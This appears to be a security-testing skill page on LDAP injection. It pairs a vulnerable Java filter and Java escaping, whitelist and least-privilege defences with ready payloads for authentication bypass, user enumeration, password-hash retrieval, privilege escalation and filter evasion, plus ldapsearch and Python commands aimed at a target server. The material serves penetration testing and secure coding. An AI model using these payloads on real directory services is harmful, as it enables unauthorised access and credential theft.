LDAP Injection Vulnerability Testing

Overview

LDAP injection is a vulnerability similar to SQL injection, which exploits flaws in the construction of LDAP query statements and may lead to information disclosure, privilege bypass, etc. This skill provides methods for detection, exploitation, and prevention of LDAP injection.

Vulnerability Principle

Applications directly splice user input into LDAP query statements without sufficient validation and filtering, allowing attackers to modify query logic.

Dangerous Code Example:

java

String filter = "(&(cn=" + userInput + ")(userPassword=" + password + "))";
ldapContext.search(baseDN, filter, ...);

LDAP Basics

Query Syntax

Basic Queries:

(cn=John)
(objectClass=person)
(&(cn=John)(mail=john@example.com))
(|(cn=John)(cn=Jane))
(!(cn=John))

Special Characters

Characters Requiring Escaping:

```
(
```
```
)
```
- Parentheses
```
*
```
- Wildcard
```
\
```
- Escape character
```
/
```
- Path separator
```
NUL
```
- Null character

Testing Methods

1. Identify LDAP Input Points

Common Functions:

User login
User search
Directory browsing
Permission verification

2. Basic Detection

Test Special Characters:

*)(&
*)(|
*))(
*))%00

Test Logical Operators:

*)(&(cn=*
*)(|(cn=*
*))(!(cn=*

3. Authentication Bypass

Basic Bypass:

Username: *)(&
Password: *
Query: (&(cn=*)(&)(userPassword=*))

More Precise Bypass:

Username: admin)(&(cn=admin
Password: *))
Query: (&(cn=admin)(&(cn=admin)(userPassword=*)))

4. Information Disclosure

Enumerate Users:

*)(cn=*
*)(uid=*
*)(mail=*

Retrieve Attributes:

*)(|(cn=*)(userPassword=*
*)(|(objectClass=*)(cn=*

Exploitation Techniques

Authentication Bypass

Method 1: Logical Bypass

Input: *)(&
Query: (&(cn=*)(&)(userPassword=*))
Result: Matches all users

Method 2: Comment Bypass

Input: admin)(&(cn=admin
Query: (&(cn=admin)(&(cn=admin)(userPassword=*)))

Method 3: Wildcard

Input: *)(|(cn=*)(userPassword=*
Query: (&(cn=*)(|(cn=*)(userPassword=*)(userPassword=*))

Information Disclosure

Enumerate All Users:

Search: *)(cn=*
Result: Returns all cn attributes

Retrieve Password Hashes:

Search: *)(|(cn=*)(userPassword=*
Result: Returns users and password hashes

Retrieve Sensitive Attributes:

Search: *)(|(cn=*)(mail=*)(telephoneNumber=*
Result: Returns multiple sensitive attributes

Privilege Escalation

Modify Query Logic:

Original: (&(cn=user)(memberOf=CN=Users,DC=example,DC=com))
Injection: user)(memberOf=CN=Admins,DC=example,DC=com))(|(cn=user
Result: May bypass permission checks

Bypass Techniques

Encoding Bypass

URL Encoding:

*)(& → %2A%29%28%26
*)(| → %2A%29%28%7C

Unicode Encoding:

* → \u002A
( → \u0028
) → \u0029

Comment Bypass

Using Comments:

*)(&(cn=*
*)(|(cn=*

Null Character Injection

Using NULL Byte:

*))%00

Tool Usage

JXplorer

Graphical LDAP Client:

Connect to LDAP server
Browse directory structure
Execute query tests

ldapsearch

bash

# Basic Query
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=*)"

# Test Injection
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=*)(&"

Burp Suite

Intercept LDAP query requests
Modify query parameters
Observe response results

Python Script

python

import ldap3

server = ldap3.Server('ldap://target.com')
conn = ldap3.Connection(server, authentication=ldap3.SIMPLE,
                        user='cn=admin,dc=example,dc=com',
                        password='password')

# Test Injection
filter_str = '*)(&'
conn.search('dc=example,dc=com', filter_str)
print(conn.entries)

Verification and Reporting

Verification Steps

Confirm control over LDAP queries
Verify authentication bypass or information disclosure
Assess impact (unauthorized access, data leakage, etc.)
Record complete POC

Report Key Points

Vulnerability location and input parameters
LDAP query construction method
Complete exploitation steps and PoC
Fix recommendations (input validation, parameterized queries, etc.)

Prevention Measures

Recommended Solutions

Input Validation

java

private static final String[] LDAP_ESCAPE_CHARS = 
    {"\\", "*", "(", ")", "\0", "/"};

public static String escapeLDAP(String input) {
    if (input == null) {
      return null;
    }
    StringBuilder sb = new StringBuilder();
    for (int i = 0; i < input.length(); i++) {
      char c = input.charAt(i);
      if (Arrays.asList(LDAP_ESCAPE_CHARS).contains(String.valueOf(c))) {
        sb.append("\\");
      }
      sb.append(c);
    }
    return sb.toString();
}

Parameterized Queries

java

// Use parameterized functionality of LDAP API
String filter = "(&(cn={0})(userPassword={1}))";
Object[] args = {escapedCN, escapedPassword};
// Build query using API

Whitelist Validation

java

// Only allow specific characters
if (!input.matches("^[a-zA-Z0-9@._-]+$")) {
    throw new IllegalArgumentException("Invalid input");
}

Least Privilege
- Use accounts with minimal privileges for LDAP connections
- Restrict queryable attributes
- Use access control lists
Error Handling
- Do not return detailed error information
- Use unified error responses
- Record error logs

Notes

Only perform in authorized testing environments
Note syntax differences between different LDAP servers
Avoid impacting the directory during testing
Understand the target LDAP server configuration

ldap-injection-testing

NPX Install

Tags

SKILL.md Content (Chinese)

LDAP Injection Vulnerability Testing

Overview

Vulnerability Principle

LDAP Basics

Query Syntax

Special Characters

Testing Methods

1. Identify LDAP Input Points

2. Basic Detection

3. Authentication Bypass

4. Information Disclosure

Exploitation Techniques

Authentication Bypass

Information Disclosure

Privilege Escalation

Bypass Techniques

Encoding Bypass

Comment Bypass

Null Character Injection

Tool Usage

JXplorer

ldapsearch

Burp Suite

Python Script

Verification and Reporting

Verification Steps

Report Key Points

Prevention Measures

Recommended Solutions

Notes